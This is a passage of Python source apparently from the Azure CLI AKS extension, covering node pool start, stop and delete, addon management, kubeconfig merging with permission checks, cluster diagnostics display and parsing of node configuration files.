"Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))
instance = client.get(resource_group_name, cluster_name, nodepool_name)
power_state = PowerState(code="Stopped")
instance.power_state = power_state
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_start(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
aks_custom_headers=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise InvalidArgumentValueError(
"Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))
instance = client.get(resource_group_name, cluster_name, nodepool_name)
power_state = PowerState(code="Running")
instance.power_state = power_state
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
ignore_pod_disruption_budget=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name, ignore_pod_disruption_budget=ignore_pod_disruption_budget)
def aks_addon_list_available():
available_addons = []
for k, v in ADDONS.items():
available_addons.append({
"name": k,
"description": ADDONS_DESCRIPTIONS[v]
})
return available_addons
def aks_addon_list(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
addon_profiles = client.get(resource_group_name, name).addon_profiles
current_addons = []
for name, addon in ADDONS.items():
if not addon_profiles or addon not in addon_profiles:
current_addons.append({
"name": name,
"api_key": addon,
"enabled": False
})
else:
current_addons.append({
"name": name,
"api_key": addon,
"enabled": addon_profiles[addon].enabled
})
return current_addons
def aks_addon_show(cmd, client, resource_group_name, name, addon): # pylint: disable=unused-argument
addon_profiles = client.get(resource_group_name, name).addon_profiles
addon_key = ADDONS[addon]
if not addon_profiles or addon_key not in addon_profiles or not addon_profiles[addon_key].enabled:
raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
return {
"name": addon,
"api_key": addon_key,
"config": addon_profiles[addon_key].config,
"identity": addon_profiles[addon_key].identity
}
def aks_addon_enable(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
no_wait=False, enable_msi_auth_for_monitoring=False):
return enable_addons(cmd, client, resource_group_name, name, addon, workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name, appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix,
appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace, enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring)
def aks_addon_disable(cmd, client, resource_group_name, name, addon, no_wait=False):
return aks_disable_addons(cmd, client, resource_group_name, name, addon, no_wait)
def aks_addon_update(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
no_wait=False, enable_msi_auth_for_monitoring=False):
addon_profiles = client.get(resource_group_name, name).addon_profiles
addon_key = ADDONS[addon]
if not addon_profiles or addon_key not in addon_profiles or not addon_profiles[addon_key].enabled:
raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
return enable_addons(cmd, client, resource_group_name, name, addon, check_enabled=False,
workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name, appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix,
appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace, enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
try:
if addons == "monitoring" and CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled and \
CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
# remove the DCR association because otherwise the DCR can't be deleted
ensure_container_insights_for_monitoring(
cmd,
instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
subscription_id,
resource_group_name,
name,
instance.location,
remove_monitoring=True,
aad_route=True,
create_dcr=False,
create_dcra=True
)
except TypeError:
pass
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None, no_wait=False, enable_msi_auth_for_monitoring=False):
instance = client.get(resource_group_name, name)
# this is overwritten by _update_addons(), so the value needs to be recorded here
    msi_auth = instance.service_principal_profile.client_id == "msi"
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper, enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait)
if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
if CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
if not msi_auth:
raise ArgumentUsageError(
"--enable-msi-auth-for-monitoring can not be used on clusters with service principal auth.")
else:
# create a Data Collection Rule (DCR) and associate it with the cluster
ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=True, create_dcr=True, create_dcra=True)
else:
# monitoring addon will use legacy path
ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=False)
monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in instance.addon_profiles:
enable_virtual_node = True
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.begin_create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
            # All agent pools reside in the same vnet; we will grant a vnet-level Contributor role
            # in a later function, so using an arbitrary agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
            # Otherwise the cluster is not using a custom VNet; the permission is already granted in the AKS RP,
            # so we don't need to handle it on the client side in this case.
else:
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
no_wait=False): # pylint: disable=unused-argument
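    """Enable or disable the requested addons on the managed cluster instance and return the
    updated instance (the request itself is sent by the caller).
    """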
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
logAnalyticsConstName = CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring" '
                                   'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = sanitize_loganalytics_ws_resource_id(
workspace_resource_id)
addon_profile.config = {
logAnalyticsConstName: workspace_resource_id}
addon_profile.config[CONST_MONITORING_USING_AAD_MSI_AUTH] = enable_msi_auth_for_monitoring
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
'To change open-service-mesh configuration, run '
f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
'To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
'To change azure-keyvault-secrets-provider configuration, run '
f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP profile because otherwise validation complains
instance.service_principal_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_os_options(cmd, client, location): # pylint: disable=unused-argument
return client.get_os_options(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
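    """Merge one kubeconfig section ('clusters', 'users' or 'contexts') from `addition` into
    `existing`, prompting before overwriting an entry with a conflicting name unless `replace` is set.
    """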
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
    if addition is None:
        raise CLIError(
            'failed to load additional configuration from {}'.format(addition_file))
    if context_name is not None:
        addition['contexts'][0]['name'] = context_name
        addition['contexts'][0]['context']['cluster'] = context_name
        addition['clusters'][0]['name'] = context_name
        addition['current-context'] = context_name
    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(
cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(
cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id,
resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
for _, diag_setting in enumerate(diag_settings):
if diag_setting:
return diag_setting.storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
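    """Poll the aks-periscope diagnostic results for every ready node and print the collected
    network configuration and connectivity tables.
    """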
if not which('kubectl'):
        raise CLIError('Cannot find the kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning(
"Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster',
str(len(ready_nodes)))
if not ready_nodes:
logger.warning(
'No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get",
"apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s',
node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s',
node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads(
'[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(
network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
def get_aks_custom_headers(aks_custom_headers=None):
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
return headers
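# Usage sketch for the parser above (header names and values are made up):
#   get_aks_custom_headers("Key1=Value1,Key2=Value2")
#   -> {'Key1': 'Value1', 'Key2': 'Value2'}
# None or "" yields an empty dict, and any pair without exactly one "="
# raises CLIError('custom headers format is incorrect').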
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
    # some addons require a role assignment after cluster creation
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
        # add the cluster SPN/MSI Monitoring Metrics Publisher role assignment to publish metrics to MDM
        # MDM metrics are supported only in the Azure public cloud, so add the role assignment only in that cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not create_role_assignment(cmd.cli_ctx, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
                logger.warning('Your cluster was created successfully, but we failed to attach '
                               'the ACR to it. You can manually grant permission to the identity '
                               'named <CLUSTER_NAME>-agentpool in the MC_ resource group to give '
                               'it permission to pull from the ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
return cluster
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or managed_cluster.identity.type.casefold() == "userassigned"))
def _get_message_of_the_day(file_path):
if not os.path.isfile(file_path):
raise CLIError(
"{} is not valid file, or not accessable.".format(file_path))
content = read_file_content(file_path)
if not content:
raise ArgumentUsageError(
"message of the day should point to a non-empty file if specified.")
content = base64.b64encode(bytes(content, 'ascii')).decode('ascii')
return content
def _get_kubelet_config(file_path):
if not os.path.isfile(file_path):
raise CLIError(
"{} is not valid file, or not accessable.".format(file_path))
kubelet_config = get_file_json(file_path)
if not isinstance(kubelet_config, dict):
raise CLIError(
"Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = KubeletConfig()
config_object.cpu_manager_policy = kubelet_config.get(
"cpuManagerPolicy", None)
config_object.cpu_cfs_quota = kubelet_config.get("cpuCfsQuota", None)
config_object.cpu_cfs_quota_period = kubelet_config.get(
"cpuCfsQuotaPeriod", None)
config_object.image_gc_high_threshold = kubelet_config.get(
"imageGcHighThreshold", None)
config_object.image_gc_low_threshold = kubelet_config.get(
"imageGcLowThreshold", None)
config_object.topology_manager_policy = kubelet_config.get(
"topologyManagerPolicy", None)
config_object.allowed_unsafe_sysctls = kubelet_config.get(
"allowedUnsafeSysctls", None)
config_object.fail_swap_on = kubelet_config.get("failSwapOn", None)
config_object.container_log_max_files = kubelet_config.get(
"containerLogMaxFiles", None)
config_object.container_log_max_size_mb = kubelet_config.get(
"containerLogMaxSizeMB", None)
config_object.pod_max_pids = kubelet_config.get(
"podMaxPids", None)
return config_object
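# Illustrative only: a kubelet configuration file in the shape the parser
# above expects. The keys mirror the .get() calls; the values are arbitrary
# examples, not recommended settings.
_EXAMPLE_KUBELET_CONFIG = {
    "cpuManagerPolicy": "static",
    "cpuCfsQuota": True,
    "imageGcHighThreshold": 85,
    "imageGcLowThreshold": 80,
    "failSwapOn": False,
    "containerLogMaxFiles": 10,
    "podMaxPids": 1024,
}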
def _get_linux_os_config(file_path):
if not os.path.isfile(file_path):
raise CLIError(
"{} is not valid file, or not accessable.".format(file_path))
os_config = get_file_json(file_path)
if not isinstance(os_config, dict):
raise CLIError(
"Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = LinuxOSConfig()
config_object.transparent_huge_page_enabled = os_config.get(
"transparentHugePageEnabled", None)
config_object.transparent_huge_page_defrag = os_config.get(
"transparentHugePageDefrag", None)
config_object.swap_file_size_mb = os_config.get("swapFileSizeMB", None)
# sysctl settings
sysctls = os_config.get("sysctls", None)
if not isinstance(sysctls, dict):
raise CLIError(
"Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object.sysctls = SysctlConfig()
config_object.sysctls.net_core_somaxconn = sysctls.get(
"netCoreSomaxconn", None)
config_object.sysctls.net_core_netdev_max_backlog = sysctls.get(
"netCoreNetdevMaxBacklog", None)
config_object.sysctls.net_core_rmem_max = sysctls.get(
"netCoreRmemMax", None)
config_object.sysctls.net_core_wmem_max = sysctls.get(
"netCoreWmemMax", None)
config_object.sysctls.net_core_optmem_max = sysctls.get(
"netCoreOptmemMax", None)
config_object.sysctls.net_ipv4_tcp_max_syn_backlog = sysctls.get(
"netIpv4TcpMaxSynBacklog", None)
